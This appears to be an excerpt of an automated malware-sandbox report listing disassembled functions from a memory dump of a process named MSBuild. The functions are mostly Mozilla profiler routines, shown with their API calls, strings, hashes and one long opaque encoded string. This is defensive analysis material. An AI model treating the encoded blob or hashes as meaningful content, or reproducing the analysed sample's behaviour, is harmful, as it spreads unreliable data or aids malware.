                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82fac6180dac9d7c5d8c56174522cbc6528d58dd2a96a259b84ae219aeaefb00
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0514671719722ABDB109F358F4493B3BF8AB4B789730482DA961E2B51EB70C901CF64
                                                                                                                                                                                                                      Function 6C8CCC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C89582D), ref: 6C8CCC27
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C89582D), ref: 6C8CCC3D
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C8FFE98,?,?,?,?,?,6C89582D), ref: 6C8CCC56
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C89582D), ref: 6C8CCC6C
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C89582D), ref: 6C8CCC82
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C89582D), ref: 6C8CCC98
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C89582D), ref: 6C8CCCAE
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C8CCCC4
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C8CCCDA
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C8CCCEC
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C8CCCFE
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C8CCD14
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C8CCD82
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C8CCD98
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C8CCDAE
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C8CCDC4
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C8CCDDA
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C8CCDF0
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C8CCE06
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C8CCE1C
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C8CCE32
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C8CCE48
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C8CCE5E
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C8CCE74
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C8CCE8A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strcmp
                                                                                                                                                                                                                      • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                                                                      • API String ID: 1004003707-2809817890
                                                                                                                                                                                                                      • Opcode ID: 1d7901c0411220ae8e5042d8cd15e0551847027d7662ab4d010488df4e982d01
                                                                                                                                                                                                                      • Instruction ID: 8ef04c9f00f3b68856d7c4cfe5af0cf4139a7a402d9cc9cbabc68e675185a3f4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d7901c0411220ae8e5042d8cd15e0551847027d7662ab4d010488df4e982d01
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35515491B0522951FA3433196F10BAA1445EB533CBF144C3EEA25A1F83FB49D74A86B7
                                                                                                                                                                                                                      Function 6C8947C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C894801
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C894817
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C89482D
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C89484A
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB3F: EnterCriticalSection.KERNEL32(6C90E370,?,?,6C883527,6C90F6CC,?,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB49
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB3F: LeaveCriticalSection.KERNEL32(6C90E370,?,6C883527,6C90F6CC,?,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BAB7C
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C89485F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C89487E
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C89488B
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C89493A
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C894956
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C894960
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C89499A
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8949C6
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8949E9
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8A5EDB
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: memset.VCRUNTIME140(6C8E7765,000000E5,55CCCCCC), ref: 6C8A5F27
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8A5FB2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C894812
                                                                                                                                                                                                                      • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C8947FC
                                                                                                                                                                                                                      • [I %d/%d] profiler_shutdown, xrefs: 6C894A06
                                                                                                                                                                                                                      • MOZ_PROFILER_SHUTDOWN, xrefs: 6C894A42
                                                                                                                                                                                                                      • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C894828
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                                                                                                                                                                      • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                                                                                                                                                                      • API String ID: 1340022502-4194431170
                                                                                                                                                                                                                      • Opcode ID: ad18604a24ed660fef39a2951fb73ef091880b82159920e9fc9b5068f11fe5b4
                                                                                                                                                                                                                      • Instruction ID: 3d9adf6a207b453c785794585af552914d125920d2085aa281f087c9ddbe4f89
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad18604a24ed660fef39a2951fb73ef091880b82159920e9fc9b5068f11fe5b4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6381E371B041008BDB20DF6CCA8875A77B5AFC231CF240A3DD926A7B91D731E955CB9A
                                                                                                                                                                                                                      Function 6C8919A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F760), ref: 6C8919BD
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C8919E5
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C891A27
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6C891A41
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C891A4F
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C891A92
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6C891AAC
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C891ABA
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 6C891C69
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C891C8F
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C891C9D
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C891CAE
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F760), ref: 6C891D52
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C891DA5
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C891DFB
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C891E49
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C891E68
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C891E9B
                                                                                                                                                                                                                        • Part of subcall function 6C892070: LoadLibraryW.KERNEL32(combase.dll,6C891C5F), ref: 6C8920AE
                                                                                                                                                                                                                        • Part of subcall function 6C892070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C8920CD
                                                                                                                                                                                                                        • Part of subcall function 6C892070: __Init_thread_footer.LIBCMT ref: 6C8920E1
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C891F15
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C891F46
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C891F52
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C891F59
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C891F60
                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C891F6D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
                                                                                                                                                                                                                      • String ID: D
                                                                                                                                                                                                                      • API String ID: 290179723-2746444292
                                                                                                                                                                                                                      • Opcode ID: f745a1988a9aa42fe18c29e6aabe2e63351f97b8b527714ae0e764db4237ea54
                                                                                                                                                                                                                      • Instruction ID: 64d840141a9dc22d3e6ea46604993ee9c1389158510463eb2a3fe40351327e44
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f745a1988a9aa42fe18c29e6aabe2e63351f97b8b527714ae0e764db4237ea54
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1F18F71A08215AFEB209F69CD88B9AB7B8FF49704F1145ADE905E7640D774DE80CFA0
                                                                                                                                                                                                                      Function 6C894470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C894730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C8944B2,6C90E21C,6C90F7F8), ref: 6C89473E
                                                                                                                                                                                                                        • Part of subcall function 6C894730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C89474A
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C8944BA
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C8944D2
                                                                                                                                                                                                                      • InitOnceExecuteOnce.KERNEL32(6C90F80C,6C88F240,?,?), ref: 6C89451A
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C89455C
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 6C894592
                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(6C90F770), ref: 6C8945A2
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000008), ref: 6C8945AA
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000018), ref: 6C8945BB
                                                                                                                                                                                                                      • InitOnceExecuteOnce.KERNEL32(6C90F818,6C88F240,?,?), ref: 6C894612
                                                                                                                                                                                                                      • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C894636
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(user32.dll), ref: 6C894644
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C89466D
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C89469F
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8946AB
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8946B2
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8946B9
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8946C0
                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C8946CD
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 6C8946F1
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C8946FD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                                                                      • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                                                                      • API String ID: 1702738223-3894940629
                                                                                                                                                                                                                      • Opcode ID: d6e0e1eab0a288874f87789fa93f2892b7ef8ab99ae137e92c17b14840796140
                                                                                                                                                                                                                      • Instruction ID: 4f838584e3c6f29dd903fe4c283867b42b9bf38416e5f7ba236802a95a606e14
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6e0e1eab0a288874f87789fa93f2892b7ef8ab99ae137e92c17b14840796140
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F76114B1708348AFEB219F68CD49B957BB8FBC670CF24899CE9149B641D7708A44CF91
                                                                                                                                                                                                                      Function 6C8CE8B0 Relevance: 38.8, APIs: 19, Strings: 3, Instructions: 297threadsynchronizationCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C7090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C8CB9F1,?), ref: 6C8C7107
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C8CDCF5), ref: 6C8CE92D
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEA4F
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEA5C
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEA80
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEA8A
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C8CDCF5), ref: 6C8CEA92
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEB11
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEB1E
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C8CEB3C
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEB5B
                                                                                                                                                                                                                        • Part of subcall function 6C8C5710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8CEB71), ref: 6C8C57AB
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEBA4
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C8CEBAC
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEBC1
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8,?,?,00000000), ref: 6C8CEBCE
                                                                                                                                                                                                                      • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C8CEBE5
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8,00000000), ref: 6C8CEC37
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C8CEC46
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C8CEC55
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8CEC5C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C8CEA9B
                                                                                                                                                                                                                      • [I %d/%d] profiler_start, xrefs: 6C8CEBB4
                                                                                                                                                                                                                      • xSYpaQ0DEooxRigYYpKXFGKYCUUtGKLjGkUdqWkouFxKKXFJQMSilooAbSU6igY2jvS0lAxKKWkoGJikNOpCKAEpKdikoGIRSU6koGNIoxS0lAISilxSEUFCUGjFFADT60E0pFJQUJRS470hoAQ0fjS0negYhpD/KnUnSgYhpMUvaiiwxuMGg+ppTSUDA0nSloxjtQCGk0HnNB/Sg8ZoKEpKU9aKAG9KOtKfrRQMbjiiiigaA9KTNL/WigYmMCkINOpO, xrefs: 6C8CEADC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
                                                                                                                                                                                                                      • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start$xSYpaQ0DEooxRigYYpKXFGKYCUUtGKLjGkUdqWkouFxKKXFJQMSilooAbSU6igY2jvS0lAxKKWkoGJikNOpCKAEpKdikoGIRSU6koGNIoxS0lAISilxSEUFCUGjFFADT60E0pFJQUJRS470hoAQ0fjS0negYhpD/KnUnSgYhpMUvaiiwxuMGg+ppTSUDA0nSloxjtQCGk0HnNB/Sg8ZoKEpKU9aKAG9KOtKfrRQMbjiiiigaA9KTNL/WigYmMCkINOpO
                                                                                                                                                                                                                      • API String ID: 1341148965-1402726850
                                                                                                                                                                                                                      • Opcode ID: e930d8ebb1a006e857ad97b9fa8b703ab74abe3092eb56fed242e565787c5357
                                                                                                                                                                                                                      • Instruction ID: 529312a2c6d91d9e83ee566ff54f4fbe8e76359115e891c57bcccb659a13c8c1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e930d8ebb1a006e857ad97b9fa8b703ab74abe3092eb56fed242e565787c5357
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EEA123317046049FDB209F28C989BAA77B5FF86318F20493DED1997B41DB70E905CBA6
                                                                                                                                                                                                                      Function 6C8CF6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF70E
                                                                                                                                                                                                                      • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C8CF8F9
                                                                                                                                                                                                                        • Part of subcall function 6C896390: GetCurrentThreadId.KERNEL32 ref: 6C8963D0
                                                                                                                                                                                                                        • Part of subcall function 6C896390: AcquireSRWLockExclusive.KERNEL32 ref: 6C8963DF
                                                                                                                                                                                                                        • Part of subcall function 6C896390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C89640E
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF93A
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF98A
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF990
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CF994
